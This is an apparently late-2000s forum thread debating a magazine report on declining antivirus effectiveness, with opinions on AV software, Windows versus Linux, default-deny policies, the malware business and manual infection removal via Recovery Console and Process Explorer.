The question I've always wondered is why something like Norton doesn't do more to control software that's running. Anybody who takes a look at RKunhooker with norton installed knows that norton puts a lot of hooks into the system, including on process start and end calls- norton pretty much becomes the gateway. But it doesn't do anything to stop infections from running, and then when you do a virus scan it reports that it can't clean the infection. You'll find it can't because the infection is in memory and therefore won't be deleted.

It's actually fairly easy to completely remove an infection, but sometimes requires running ERD or bartPE to remove items from startup and delete certain DLLs that load automatically with explorer. Once the hooks are removed, there are no active infections, just dormant files waiting for an AV to delete them.

Re:Useless

[Jessta]

You miss the point, having an allow-deny popup is just as pointless.
You have a predefined list of programs that can run and what they are allowed to do everything else is denied.

On a home machine:
* programs installed through the package manager are automatically added to the list with their default privileges
* If a user tries to run a denied program they are informed that it's untrusted and probably dangerous, but because it's a home machine they are given the option to run it anyway.

On an office machine:
* only programs signed by the administrator are able to be run
* if a user wants to run a program not in the administrator's repository they have to contact the administrator.

it's pretty simple stuff.

Standard advice? Ouch.

[Xest]

That's some pretty poor advice to run multiple anti-virus apps. other than AV vendors who all want a piece of the pie where is this being suggested? Initially there's the fact many conflict in their tasks and implementation to the point where having multiple AV software will sometimes goes as far as giving you a nice BSOD each time you boot up until you can mangle one AV app out of your system using recovery console or safe mode (Some versions of Symantec and McAfee for example). Ignoring that however there's the most prominent problem of the ridiculous drain in system resources you'll suffer from having one, let alone 2 AV apps - even worse if you stick an anti-spyware app. in also! I've yet to see any enterprise network deploying multiple AV solutions to the same machines and the only place I could see this being advised is the likes of Futureshop, PC World or whatever big chain wants to make as much money as possible selling useless apps in your particular country.

The best way to protect yourself from viruses or spyware is to not get them in the first place. That requires educating users to avoid sites that appear dodgy, to not download anything that isn't from a reputable publisher and to not open attachments unless you're expecting them and trust the source fully.

Current AV systems are flawed, malware has evolved but AV software really hasn't. It's still following the paradigm of reactive action which is hopeless in today's world because by the time AV software has acted the malware has already had chance to embed itself and potentially even disable or remove the AV in question.

It's only going to get worse also, I'm not entirely sure why we haven't seen extremely vicious viruses yet but I'd like to think that it's because anyone competent enough to writing such a virus would be intelligent enough to put their efforts elsewhere for good use. Looking forwards for example with advances in AI we might encounter viruses that can mutate to use new security holes, viruses that work as P2P networks to distribute virus updates and hence become as difficult to shut down as the file sharing phenomenon and so on. The current AV market is both a sham and a scam, to suggest that much of the AV software out there really protects people is a lie, it doesn't. The times I've seen AV programs out there detect stuff it all too often can't clean it and so manual removal ends up being the only solution anyway.

Viruses need to be stopped at the borders, but the difficulty is simply the amount and type of borders (Internet - various services, floppy, USB, CD, etc.). We can of course follow the trusted computing route but that's not ideal either because companies don't trust us to use our computers so we lose a massive amount of freedom which to many of us makes computing great. There's no easy solution to the problem but the current option offered by AV vendors isn't even a viable start to the solution now, let alone in the future, it's like trying to save a decapitated person by sticking bandage on their neck when the only way to save them was to prevent such an accident in the first place. Sticking multiple bandages on that neck still isn't going to save that person!

Re:Standard advice? Ouch.

[barzok]

I'm not entirely sure why we haven't seen extremely vicious viruses yet but I'd like to think that it's because anyone competent enough to writing such a virus would be intelligent enough to put their efforts elsewhere for good use.

I think it's more because a "mildly irritating" virus will be removed, leaving the host to get infected again. An "extremely vicious" virus will take out the host and whatever replaces it will be better protected. Enough of this goes on and the number of available hosts drops significantly.

Plus, there's more money in writing an "irritating" virus which operates as part of a botnet than a really nasty one that just takes systems out completely.

Re:Standard advice? Ouch.

[Xest]

Sorry I should have clarified, by vicious I didn't so much mean damaging but more one that has extremely strong infection capabilities and strong countermeasures against removal (anti-anti-virus etc.).

In a P2P virus network there's no reason the virus couldn't update itself with new plugins for exploiting new vulnerabilities allowing it to spread yet further. If the virus could also update anti-anti-virus techniques it could potentially be very hard to wipe out whilst still fulfilling the same purposes as existing hijacked PCs - essentially we'd be looking at extremely resilient botnets and such that literally expand themselves and to an extent protect themselves even in the face of many of todays standard countermeasures.

I've not been up on what bot herders are upto nowadays but it can only be a matter of time before these techniques are adopted if they don't exist already.

Most AV solutions

[Mgns]

really just make my machine choke and die. I run an ancient computer with only 256 RAM, more than enough for my use, but not long ago I knew I'd been infected. So I HAD to install something.

I ended up installing the free 30 day trial from Norman. Long story short, it's the only AV I've ever tried that I didn't positivly hate.

The Real Reason

[LaskoVortex]

The real reason for massive viruses is windows. I know all of the "unbiased" people will mod this down, but you are fooling yourselves think windows is a legitimate operating system. I set my brother and uncle up with ubuntu boxes last summer and they haven't needed to reboot yet! No viruses. Top speed. Both of them previously had windows machines that took all of about 2 weeks to get so loaded with viruses, it was silly. They haven't had a problem with this since May. Windows isn't going away, you say, but it friggin' should. You probably want to call me a "fan boy", but you have chosen and/or support the wrong operating system, plain and simple. Every time I set someone up with a Linux box, their virus problems go away and their machines (ancient) purr. Am I biased? Confused? Its friggin' results people. I tell you what, if you've done the work to convert four *real* people away from that shit operating system windows and still disagree, mod this down. If you haven't then you have no business having an opinion. I speak from the trenches--real users with *no* savvy, personal computers, home use, no VM. I set them up and they fly. Convert some of these people and see how they begin loving their PCs. Don't mod this if you don't have the cred. Mod it up if you know what I'm saying.

Re:The Real Reason

[Opportunist]

Windows is an insecure piece of crap. Ok. So far, so good. But the real reason why it is the main target for malware is simply that it is the most used system.

Malware has turned into a business. It's no longer the 16 year old pimple-face that wants to prove he has the longest virtual dick. It's biz. Malware is being written in almost normal looking "companies", cranking out quite professional software, complete with versions, updates, CVS systems and other things you'd expect in a "normal" software company. Because it simply IS a normal software company, with the goal to make money from their software.

Their main reason why they target Windows isn't its inherent insecurity. It's simply that this is the main system used in the world. It would be not a bit different if the 90% market share system would be Linux or MacOS.

Now, I can already hear "but it's harder to infect a Linux machine". Bullcrap! To infect a fully patched Windows system is about as hard, at least if the user isn't a complete tool. And with a user that has the computer ability of a slightly moldy slice of toast, it does not matter how secure the machine itself may be. It will probably take a bit more social engineering, but people are stupid enough to click on everything, allow everything and hand any kind of crapware their root password when you promise them some nude pics, some crack for a piece of software or some make-money-fast software.

The reason why it doesn't happen is simply that it doesn't pay to go to those lengths. A Linux system run by a user who can't tell a floppy disk from a USB stick is still such a tiny, insignificant minority that it's simply not worth developing for him.

Re:The Real Reason

[cdrguru]

If I send your brother and uncle an email that says "click this and get rich!!!" and they do it, they are going to get infected with something. Linux might be a bit harder, especially if you keep the user from doing anything "adminstratively" with the computer but if you execute a untrustworthy program on the computer you are going down the road to trouble. If your computer then asks for permission to do something "administrative" and you grant it, you're had.

99% of the users do not need to install software, run ActiveX controls or run executable things (scripts, programs, anything) on their computer. They need to use the software that was installed when they got it and nothing more. Opening the door to them installing any random piece of junk that comes along or executing some type of code from email or web pages is an invitation to disaster. It doesn't matter if it is Windows or Linux - if the user can authorize unsafe actions on the machine and does so blindly the machine will be compromised.

Now it is true today that there are very few, if not zero, things that are targeting Linux. Most people run Windows and that is the environment that is targeted. But the problem isn't the operating system - you cannot protect the computer from an administrator that is a fool.

The only real answer - which you might have done with a Linux system - is remove any possibility of the user doing anything outside of a small set of "user" actions. No administration. No software installs. No executing anything that wasn't there when the administrator set it up. Computers for these people are not general-purpose programming environments but simple appliances. Deviating from that "appliance" concept is where the trouble starts.

If you gave your brother and uncle an appliance, more power to you. If you gave them a general purpose computer that they do not understand this isn't a solution.

Re:The Real Reason

The real reason is Windows, you say?
I say the real reason is ignorance.
I use Windows (as a gamer, I don't have much choice - while some games do have Linux or Mac versions, most don't), and I haven't had a virus infection since 1997 (one of those M$ Word macro viruses, courtesy of using an infected machine at college), just courtesy of plain common sense: not opening dodgy e-mail attachments, not downloading stuff that looks untoward (as a matter of fact the only things I download are games-related and TV eps from BitTorrent), and using a browser with ad and pop-up blockers (ATM that's Firefox.)
Mind you, I think vendors who sell pre-installed systems are partly to blame. If more PC vendors properly configured a new Windows installation and maybe installed Firefox as default browser, for example, the rate of infection would probably drop if not overnight, fairly sharply.

AV software causes more problems then it solves

[Tridus]

I've known that AV software doesn't work very well for quite a while. Its really nothing new. It is nice to have someone doing tests that I can shove in peoples faces, though.

This isn't the biggest problem though. AV software is actively harmful. Aside from dramatically slowing down EVERYTHING, it can flat out break stuff. Norton in particular is notorious for screwing things up, to the point that if someone asks me about a problem with their computer now, my first answer is always "uninstall Norton."

Running the gambit from games being intolerably slow to programs crashing to drivers inexplicably failing to install (even after turning Norton off), to date "uninstall Norton" has never failed to fix the problem.

(Really, Norton and the virus makers themselves aren't much different, in that both of them prey on the computer illiterate.)

Re:AV software causes more problems then it solves

[Opportunist]

You judge the AV industry by your experience with Norton. That's like saying cars are crap because you didn't like that old Lada you got.

It's a bit like saying webcams crash your system because you had one from Logitec (whose driver actually does just that). Or like saying OSs suck because you've seen what Vista is like.

There are decent AV companies about who do take care that the footprint they leave in the system is small, and that their drivers (which have to be quite invasive, unfortunately) don't ruin the system they're supposed to protect. Please don't judge the whole industry by one single experience.

Re:AV software causes more problems then it solves

Sadly I've been known to have all those issues even though this machine has never had a copy of Norton within forty miles of it.

However I believe the fault to lie with my graphics card and/or the nVidia Forceware drivers.

Re:AV software causes more problems then it solves

[Kayyham]

Yeah, I've Never had AV software on my home computer, and to this day I've never had a virus that's slowed down or screwed up my computer more than anti-virus software does. The cure is worse than the disease!

Of course effectiveness is falling...

[A+Pressbutton]

And it will fall still further.
Time was a virus would either just pop up an annoying message or delete random data or reformat your PC. Effectively viruses and virus writers were hunters and once they had got the target they had no further interest.

Virus writers have now become 'civilised' farmers. They now get paid for their efforts.
The writers have a tame herd (of infected PCs). They will spend their time trying to make sure the AV software will not interfere (to them these things are the infection). They spend their time tending their herd and catching 'wild' examples - other peoples virii (?) so they cross-breed.

One consquence of this (if correct) is that viruses may well start to remove other infections, and generally tune up your PC. After all, if your PC is working just fine, why would you bother keeping the AV scanner up to date?

Re:Of course effectiveness is falling...

[SixFactor]

That is an excellent analogy: hunter/gatherers transformed into farmers (or ranchers). Tend the crops (or herd), and they ensure continued profitability.

I like it.

Re:I have the solution

[Opportunist]

I tried that too, and it was the only time I ever got infected by accepting some random packets. No thanks, I'll stay with what I know.

yes it can

man cron; man at

There is a better strategy

[Frozen+Void]

Never install anything executable ,where you do not trusts the author.
No single virus for all these years.
and if you do really need something try
http://www.virustotal.com/en/indexx.html

Viruses are a 'stupid user' issue

[SCHecklerX]

You can't hope to really fix bad behavior with technology. This is why instead of giving dad a false sense of security with cpu/disk thrashing AV software, I took the time to show him the nastiness that can go on, especially with email attachments, and downloading and running software he doesn't know anything about. I also set him up with firefox with the adblock plus extension. On his own (even though I didn't feel it was necessary), he manually runs adware detecting software to make sure nothing has been slipping by. Three years, and he has yet to be infected with anything (manual AV scan with latest signatures when I was there the other day confirms).

Tools and their uses:
- Firewalls: block stuff you shouldn't be listening for anyway, also help to mitigate against attacks against stuff you do listen for.
- Service Lockdown (difficult on windoze, see "Firewalls" above): You can't exploit something that's not there
- Proper configuration of what you do need listening: default stuff on that linksys router, for example
- Patches: Deal with worms (not viruses)
- AV software: tries to correct user stupidity. Not exactly a winning battle, as can be seen by the existence of this article.
- IDS: Never for an end user. How are they to know how to tune it, and what the messages mean, etc?

My experience has been that AV software gets in the way, causes system instability, and provides a false sense of security. None of this provides a significant benefit for a user who already practices good hygiene on their computer.

Re:Viruses are a 'stupid user' issue

[gardyloo]

You can't hope to really fix bad behavior with technology. Don't tase me, bro!

Why the drugs don't work anymore

[Opportunist]

It was prone to happen. Actually I'm amazed it's considered news.

The malware-antimalware war ain't a static one. Both sides are engaging in a quite impressive arms race. They start creating morphing trojans, we create ways to detect them, they create global trojan floods, we employ detection networks to catch them, they switch from mail distribution to infected webpages, we start sending out spiders, they start using targeted spam, we create fake personalities to be "interesting" for them, they ...

It's just the same with the detection and elimination routines. They use certain API calls, we start listening to those calls carefully, they switch the calls, we follow, they start using executable packers, we develop exec unpackers, we discover that malware PE headers have a certain format, they change the format and create "filler" sections to look normal...

It's just a chapter in that arms race. Give us 2 months and we're back on par.

A quote from c't article

[Thelasko]

"Alles turisten und nonteknischen lookenpeepers! Das komputermaschine ist nicht für der gefingerpoken und mittengraben! Oderwise ist easy to schnappen der springenwerk, blowenfusen und poppencorken mit spitzensparksen. Ist nicht für gewerken bei dummkopfen. Der rubbernecken sightseeren keepen das cottonpicken händer in das pockets muss. Zo relaxen und watschen der blinkenlichten. "

Skewed

[raijinsetsu]

I don't think that it's the effectiveness of the heuristics that has decreased. It's probably the virus and malware programmers have gotten craftier: studying how these algorithms work and countering them. It's one of the reasons why I stay away from the mainstream AVs.

No FUD please... Packagemanagement is the problem

[jopsen]

The reason that Linux is largely unaffected is that it is not very widely used, especially by the sort of numpties that get tempted by exciting new screensavers baring trojans

One word: FUD!

The biggest problem to the windows desktop today is that most applications aren't updated... Most people doesn't update Java, Quicktime, Acrobat, Mediaplayer, flash or even their browser. And doing this is rather difficult, by now many more of them have automatic updaters, but most people ignore those, or switch them off because they are annoying.
Applications like these are the once making windows very insecure, ofcourse the windows update that doesn't work very well contributes a lot too... But lack of systemwide update manager or packagemanager if you like is why millions of PC's need virus protection.

On Linux apps are usually patched very fast and all apps are updated through the packagemanager. If the update manager didn't popup every second day or so, I'd never update my apps... Especially not if I had to download a separated installer/updater, like most windows apps still requires...

On my parent windows machine, which I borrow from time to time for printing, I used Opera.. I think it's version 8.x and every time I start it it popups saying there's an updated version. But I just want to go online to download a document for printing, or who knows and close it instead of actually bordering to update opera :)

copy protection mechanisms == malware

[jopsen]

In short, copy protection mechanisms share a fair lot of features with malware. It is often not easy to discriminate between them.

Why not make it clear: copy protection mechanisms is malware... It does not serve you! And Sonys rootkit were installed with your consent, in the sense that you clicked ok to something a lawyer wrote, but no one else have read...

Re:copy protection mechanisms == malware

[Opportunist]

Because that would mean you find every single current game as malware. Can you imagine the outcry?

For reference, see grandparent.

I have a novel solution...

Instead of wasting effort on the unwinnable war of detecting mallicious intent in executable software -- Perhaps people should concentrate on preventing said execution in the first place.

Oh great, the retarded mods are out again

[Colin+Smith]

Apparently they are unaware that the diversity which sexual reproduction creates effectively limits the size of the population which a virus can infect, severely curtailing the spread.

AV Comparitives

[sh33333p]

Since this article is about a print article in German, you may want to check out the site http://www.av-comparatives.org/

Malware is an arms race, and the comments about AV software being useless are bull. It just isn't a panacea either. Schneier says security is a trade-off. Average users don't want to be inconvenienced by things like applying the principle of least privilege. Personally I use SudoWn and Runasspc with my XP Pro system when I need to elevate something to admin, and a combination of Avira/Spybot-SD and Firefox with NoScript. That's the software side. The most important thing I do for my security is to mistrust everything by default. I don't install stuff that's likely to be infected. Even if I think something is safe, I scan it manually before I run it with admin privs. I've been virus/malware free since I put this system together back in March of this year, and I've probably installed nearly 100 applications in that time.

PS: The later versions don't seem to work for me, but version 2.0 of SudoWn does, and it requires .Net 2.0.
Hopefully this is helpful to at least one person.

Read Fred Cohen on what is a virus

[starfishsystems]

I don't know why either. Well, I do know why, and it comes down to a remarkably cavalier design decision by one particular software vendor.

Default Allow is fundamentally not a basis from which a system can be secured. It forces every system user to maintain perfect knowledge of a changing universe. Default Allow plus virus detection is, in the limit, equally doomed. Fred Cohen pointed out over two decades ago that virus detection is equivalent to solving the Halting Problem. Either way, it signs us up for an infinite amount of work.

Default Deny, on the other hand, certainly requires us to do some work, to consciously qualify those 30 pieces of Goodness. That requires explicit effort, but it's a finite amount of work. So why, in the face of such clear advantages, do so many people want to avoid this policy? I can only think that they resist the idea of responsibility. And that's a matter of perception, something that I hope people will eventually come to rethink.

viruses definitely better in windows

[datapharmer]

I have been removing viruses from friends and clients computers since I was 8 years old (I'm almost 24). 99% of these have been on microsoft OSes or Dos-esque OSes. I have never failed to clean a system until yesterday.

Using a combination of virus removal tools and a process viewer and a few other security tools on a CD-R i've been able to find every instance every time - until yesterday. In a few cases i've had to replace some system filed due to them getting completely destroyed or had to repair an MBR, but never before did I have to say "time to do a low level format and start over"....

I had installed cleaned this guy's system about 2 years ago. He was setup with a non-admin account to use and automatically renewing virus scanning, ad-aware, and several other security tools.

Yet after his niece used the PC it became infected.

I could see this virus running, I even found 1 virus with F-PROT - AVG, Kapersky, Avast, and BitDefender all found nothing. I had to run them from a boot CD because the virus had done something funky with administrator rights even under safe mode.

I felt horrible, because truth be told, if I back up his documents, I can't honestly tell him reloading them on a clean system won't b ring back the virus - the detectors couldn't find them before, they may not again.

All I could say was I'll make a ghost disc so you can get the system back to normal by yourself. I haven't dealt with Vista viruses yet, but there is no stopping a novice p2p user from getting a virus.

datapharmer, use RECOVERY CONSOLE

[quote][b]"I could see this virus running, I even found 1 virus with F-PROT"[/b] - by datapharmer (1099455) on Friday December 21, @04:20PM (#21784590) Homepage[/quote]

IF you can get its name, & location on disk? Boot to RECOVERY CONSOLE, & fry it then (nothing will be loading & thus, locking it, there).

It's THAT, or using Process Explorer, suspending the calling process, via watching loaded DLL's (CTRL+D with the lower pane view set like that) IF there is one and this thing doesn't launch by itself from one of the registry RUN areas or startup groups that is...

Using Process Explorer can help, especially if this is being run by "DLL Injection" (like an OLEServer being injected into a process via CLSIDs, shell extensions, or being run by rundll32.exe OR svchost.exe, process hosting executables that can spawn either .exe OR .dll/lib based ones).

The easier/simpler route? Use Recovery Console, once you have its name & location on disk... DEL command will take care of it, lickety-split, no-shit.

APK

datapharmer: ProExp (better yet, RECOVERY CONSOLE)

"I could see this virus running, I even found 1 virus with F-PROT" - by datapharmer (1099455) on Friday December 21, @04:20PM (#21784590) Homepage IF you can get its name, & location on disk? Boot to RECOVERY CONSOLE, switch to the folder that houses it using CD (almost like DOS one, but uses .. ONLY, to switch to ancestor folder roots really (instead of \ etc. et al))!

Then, once you are in its folder, fry it then (nothing will be loading & thus, locking it, there) using the DEL command -> DEL filename.

----

It's THAT, or using Process Explorer in UserMode/Ring 3/RPL3 operation...

You would do a suspending the calling process via right click popup menu options for this it offers!

(This ia assuming this is a lib loaded virus/spyware/trojan/malware etc., not a standalone .exe type)

That's done via watching loaded DLL's that ANY app may have loaded presently (For that, you would have to use ProExp's CTRL+D keystroke shortcut, with the lower pane view present/visible, & set like that) IF there is one and this thing doesn't launch by itself from one of the registry RUN areas or startup groups that is...

Using Process Explorer can help!

(Again, especially if this is being run by "DLL Injection" (like an OLEServer being injected into a process via CLSIDs, shell extensions, or being run by rundll32.exe OR svchost.exe, process hosting executables that can spawn either .exe OR .dll/lib based ones)).

----

The easier/simpler route?

My first suggestion:

Use Recovery Console, once you have its name & location on disk... DEL command will take care of it, lickety-split, no-shit.

APK